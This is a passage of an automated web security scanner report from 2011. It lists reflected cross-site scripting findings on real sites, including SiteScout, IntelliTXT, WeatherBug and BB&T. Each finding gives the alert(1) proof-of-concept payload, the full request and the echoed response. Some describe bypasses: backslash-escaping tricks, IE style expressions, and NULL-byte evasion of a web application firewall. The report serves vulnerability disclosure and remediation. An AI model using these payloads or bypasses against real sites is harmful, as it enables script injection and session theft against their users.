var pUrl = "http://smm.sitescout.com/disp?pid=21818F4aed62";alert(1)//eec28b3a643&cm=http%3A%2F%2Fxads.zedo.com%2Fads2%2Fc%3Fa%3D885848%3Bx%3D2304%3Bg%3D172%3Bc%3D1220000175%2C1220000175%3Bi%3D0%3Bn%3D1220%3B1%3D8%3B2%3D1%3Bs%3D134%3Bg%3D172%3Bm%3D82%3Bw%3D47%3Bi%3D0%3Bu%3DINmz6woB
...[SNIP]...

4.434. http://smm.sitescout.com/tag.jsp [w parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://smm.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79fda'%3balert(1)//cbed4520d8d was submitted in the w parameter. This input was echoed as 79fda';alert(1)//cbed4520d8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=21818F4&w=30079fda'%3balert(1)//cbed4520d8d&h=250&rnd=%r&cm=http://xads.zedo.com/ads2/c?a=885848;x=2304;g=172;c=1220000175,1220000175;i=0;n=1220;1=8;2=1;s=134;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=1080864;h=922865;k= HTTP/1.1
Host: smm.sitescout.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 650
Date: Thu, 03 Feb 2011 16:23:46 GMT
Connection: close


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://smm.sitescout.com/disp?pid=21818F4&cm=http%3A%2F%2Fxads.zedo.com%2Fads2%2Fc%3Fa%3D885848%3Bx%3D2304%3Bg%3D172%3Bc%3D1220000175%2C12
...[SNIP]...
<IFRAME SRC="'
+ pUrl
+ '" WIDTH="30079fda';alert(1)//cbed4520d8d" HEIGHT="250" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

4.435. http://thestreet.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://thestreet.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1bad9<script>alert(1)</script>6e86ca26221 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /intellitxt/front.asp?ipid=10685&1bad9<script>alert(1)</script>6e86ca26221=1 HTTP/1.1
Host: thestreet.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.thestreet.com/story/229c029d89d776ed)(sn=*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA6yAEAAAEthmhrrQA-; VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63AEAAAEt6+c+YAA-; Domain=.intellitxt.com; Expires=Mon, 04-Apr-2011 14:22:36 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 14:22:36 GMT
Connection: close
Content-Length: 8275

/* This source code is Copyright (c) Vibrant Media 2001-2011 and forms part of the patented Vibrant Media product "IntelliTXT" (sm). */
if('undefined'==typeof $iTXT){var $iTXT={};}if('undefined'==typ
...[SNIP]...
ad();}}};function itxtBegin(){
var itxturl='http://thestreet.us.intellitxt.com/v3/door.jsp?ts='+(new Date()).getTime()+'&pagecl='+itxtbtl()+'&enc='+itxtGCE()+'&fv='+gDFVS()+'&muid='+MUID+'&ipid=10685&1bad9<script>alert(1)</script>6e86ca26221=1';
itxturl+='&seid='+gSEID+'&sest='+gSEST;
if ($iTXT && $iTXT.js && $iTXT.js.ready) {$iTXT.js.load(itxturl);
} else if ($iTXT && $iTXT.js) {$iTXT.js.onload = function() {
$iTXT.js.load(itxturl);
...[SNIP]...

4.436. http://thestreet.us.intellitxt.com/v3/door.jsp [sest parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://thestreet.us.intellitxt.com
Path:   /v3/door.jsp

Issue detail

The value of the sest request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbce3\'%3balert(1)//470e2868204 was submitted in the sest parameter. This input was echoed as cbce3\\';alert(1)//470e2868204 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /v3/door.jsp?ts=1296742745648&pagecl=2359&enc=&fv=101&muid=&ipid=10685&seid=0&sest=cbce3\'%3balert(1)//470e2868204 HTTP/1.1
Host: thestreet.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.thestreet.com/story/229c029d89d776ed)(sn=*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63AEAAAEt6+LRYAA-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Content-Type: application/x-javascript;charset=iso-8859-1
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 14:22:49 GMT
Connection: close
Content-Length: 10430


/* This source code is Copyright (c) Vibrant Media 2001-2011 and forms part of the patented Vibrant Media product "IntelliTXT" (sm). */
try{if('undefined'==typeof $iTXT){var $iTXT={};}$iTXT.door={}
...[SNIP]...
omponent(tTXT.replace(/\n/,' ')); while (p.ttxt.indexOf('\'')>-1) p.ttxt=p.ttxt.replace('\'', '%27');p.auat=0;p.lpgv=0;p.ddate=dDate;p.pvu=gPVU;p.pvm=gPVM;p.forcedb=0;p.seid=gSEID;p.unrm=false;p.sest='cbce3\\';alert(1)//470e2868204';p.ru=encodeURIComponent(sRU);cAs(server,p);} else if (gCL){if(((gITXTN!=null&&gITXTN.length)||(gITXTNi!=null&&gITXTNi.length))&&gCL>
...[SNIP]...

4.437. http://weather.weatherbug.com/ [zcode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://weather.weatherbug.com
Path:   /

Issue detail

The value of the zcode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 531ee"%3balert(1)//40807062aa8 was submitted in the zcode parameter. This input was echoed as 531ee";alert(1)//40807062aa8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?zip=75201&zcode=6292531ee"%3balert(1)//40807062aa8 HTTP/1.1
Host: weather.weatherbug.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Length: 100657
Content-Type: text/html; charset=utf-8
Set-Cookie: wxbug_cookie1=lang_id=en-US&units=0&has_cookies=1; domain=weatherbug.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
p3p: CP="NON DSP COR NID"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cache-Control: max-age=2700
Date: Thu, 03 Feb 2011 16:34:53 GMT
Connection: close


                                                                                   
...[SNIP]...
<script type="text/javascript">
   var feedbackURL = "http://weather.weatherbug.com/feedback-form.html?zcode=6292531ee";alert(1)//40807062aa8&region=8&region_name=North America&country=US&country_name=USA&state_code=TX&state_name=Texas&zip=75201&city_name=Dallas&stat=DALS1";
</script>
...[SNIP]...

4.438. http://weather.weatherbug.com/ [zcode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://weather.weatherbug.com
Path:   /

Issue detail

The value of the zcode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b886"style%3d"x%3aexpression(alert(1))"e0fb95ae5dc was submitted in the zcode parameter. This input was echoed as 3b886"style="x:expression(alert(1))"e0fb95ae5dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?zip=75201&zcode=62923b886"style%3d"x%3aexpression(alert(1))"e0fb95ae5dc HTTP/1.1
Host: weather.weatherbug.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Length: 104331
Content-Type: text/html; charset=utf-8
Set-Cookie: wxbug_cookie1=lang_id=en-US&units=0&has_cookies=1; domain=weatherbug.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
p3p: CP="NON DSP COR NID"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cache-Control: max-age=2700
Date: Thu, 03 Feb 2011 16:34:36 GMT
Connection: close


                                                                                   
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="All WeatherBug feeds" href="http://feeds.weatherbug.com/rss.aspx?zipCode=75201&zCode=62923b886"style="x:expression(alert(1))"e0fb95ae5dc&units=0&feed=curr,fcst,cpht,news" />
...[SNIP]...

4.439. http://weather.weatherbug.com/ [zcode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://weather.weatherbug.com
Path:   /

Issue detail

The value of the zcode request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8c92\'%3balert(1)//fb3d6162354 was submitted in the zcode parameter. This input was echoed as b8c92\\';alert(1)//fb3d6162354 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /?zip=75201&zcode=6292b8c92\'%3balert(1)//fb3d6162354 HTTP/1.1
Host: weather.weatherbug.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Length: 101771
Content-Type: text/html; charset=utf-8
Set-Cookie: wxbug_cookie1=lang_id=en-US&units=0&has_cookies=1; domain=weatherbug.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
p3p: CP="NON DSP COR NID"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cache-Control: max-age=2700
Date: Thu, 03 Feb 2011 16:35:04 GMT
Connection: close


                                                                                   
...[SNIP]...
dmn = document.domain;
        wxOAS_sitepage = 'www.wthrwbug.com/HM';
    wxOAS_url = 'http://pub.weatherbug.com/RealMedia/ads/';
    wxOAS_targetparams = '&DMN=' + dmn + '&LNG=enUS&PC=6292b8c92\\';alert(1)//fb3d6162354&Z3=75201&L2=Dallas&L3=TX&L5=USA&L1=623&L4=53&WO1=20.3&FC1=1&FC2=126&FC3=7&FC7=33&FC9=49&WO3=101&HO1=2.70&HO4=Cedar/Juniper and Elm.&HO3=-999';
    wxOAS_listpos = 'cds1,cds2,cds3,cds4,cds9';
   
...[SNIP]...

4.440. http://weather.weatherbug.com/ [zcode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://weather.weatherbug.com
Path:   /

Issue detail

The value of the zcode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 478ba"style%3d"x%3aexpression(alert(1))"78c9aed888 was submitted in the zcode parameter. This input was echoed as 478ba"style="x:expression(alert(1))"78c9aed888 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?zip=75201&zcode=478ba"style%3d"x%3aexpression(alert(1))"78c9aed888 HTTP/1.1
Host: weather.weatherbug.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Length: 103556
Content-Type: text/html; charset=utf-8
Set-Cookie: wxbug_cookie1=lang_id=en-US&units=0&has_cookies=1; domain=weatherbug.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
p3p: CP="NON DSP COR NID"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cache-Control: max-age=2700
Date: Thu, 03 Feb 2011 16:34:49 GMT
Connection: close


                                                                                   
...[SNIP]...
<iframe name="cds1" src="http://pub.weatherbug.com/RealMedia/ads/adstream_sx.cgi/www.wthrwbug.com/HM@cds1?&LNG=enUS&PC=478ba"style="x:expression(alert(1))"78c9aed888&Z3=75201&L2=Dallas&L3=TX&L5=USA&L1=623&L4=53&WO1=20.3&FC1=1&FC2=126&FC3=7&FC7=33&FC9=49&WO3=101&HO1=2.70&HO4=Cedar/Juniper and Elm.&HO3=-999" width="728" height="90" allowtransparency="true" framebord
...[SNIP]...

4.441. http://www.bbt.com/bbt/Business/Products/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbt.com
Path:   /bbt/Business/Products/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f5e39"><script>alert(1)</script>409e4716c9d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f5e39"><script>alert(1)</script>409e4716c9d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /bbt/Business/Products/?%00f5e39"><script>alert(1)</script>409e4716c9d=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:13 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 53268
cache-control: private
x-powered-by: ASP.NET


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
   
   
           
...[SNIP]...
<a href="/bbt/Business/Products/default.html?page=print&%00f5e39"><script>alert(1)</script>409e4716c9d=1" onclick="NewWindow(this.href,'product','650','500','yes');return false;">
...[SNIP]...

4.442. http://www.bbt.com/bbt/Personal/Products/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbt.com
Path:   /bbt/Personal/Products/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0069b54"><script>alert(1)</script>e1573406ba9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 69b54"><script>alert(1)</script>e1573406ba9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /bbt/Personal/Products/?%0069b54"><script>alert(1)</script>e1573406ba9=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:11:49 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 40557
cache-control: private
x-powered-by: ASP.NET


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
   
   
           
...[SNIP]...
<a href="/bbt/Personal/Products/default.html?page=print&%0069b54"><script>alert(1)</script>e1573406ba9=1" onclick="NewWindow(this.href,'product','650','500','yes');return false;">
...[SNIP]...

4.443. http://www.bbt.com/bbt/about/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbt.com
Path:   /bbt/about/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %002a618"><script>alert(1)</script>b69e85cef55 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2a618"><script>alert(1)</script>b69e85cef55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /bbt/about/?%002a618"><script>alert(1)</script>b69e85cef55=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:11:46 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 27477
cache-control: private
x-powered-by: ASP.NET


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<
...[SNIP]...
<a href="/bbt/about/default.html?page=print&%002a618"><script>alert(1)</script>b69e85cef55=1" onClick="NewWindow(this.href,'product','650','500','yes');return false;">
...[SNIP]...

4.444. http://www.bbt.com/bbt/about/privacyandsecurity/completeclientprotection/default.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbt.com
Path:   /bbt/about/privacyandsecurity/completeclientprotection/default.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007a93d"><script>alert(1)</script>a2f88c48136 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7a93d"><script>alert(1)</script>a2f88c48136 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /bbt/about/privacyandsecurity/completeclientprotection/default.html?%007a93d"><script>alert(1)</script>a2f88c48136=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:35 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 30854
cache-control: private
x-powered-by: ASP.NET


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   

       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
   
   
           
...[SNIP]...
<a href="/bbt/about/privacyandsecurity/completeclientprotection/default.html?page=print&%007a93d"><script>alert(1)</script>a2f88c48136=1" onclick="NewWindow(this.href,'product','650','500','yes');return false;">
...[SNIP]...

4.445. http://www.bbt.com/bbt/careers/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbt.com
Path:   /bbt/careers/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0012a7a"><script>alert(1)</script>5fb5315ccee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 12a7a"><script>alert(1)</script>5fb5315ccee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /bbt/careers/?%0012a7a"><script>alert(1)</script>5fb5315ccee=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:11:51 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 33957
cache-control: private
x-powered-by: ASP.NET


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

       
   <title>Car
...[SNIP]...
<a href="/bbt/careers/default.html?page=print&%0012a7a"><script>alert(1)</script>5fb5315ccee=1" onclick="NewWindow(this.href,'product','650','500','yes');return false;">
...[SNIP]...

4.446. http://www.bbt.com/bbt/mobile/mobile-product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbt.com
Path:   /bbt/mobile/mobile-product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f9529"><script>alert(1)</script>45d303da152 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9529"><script>alert(1)</script>45d303da152 in the application's response.

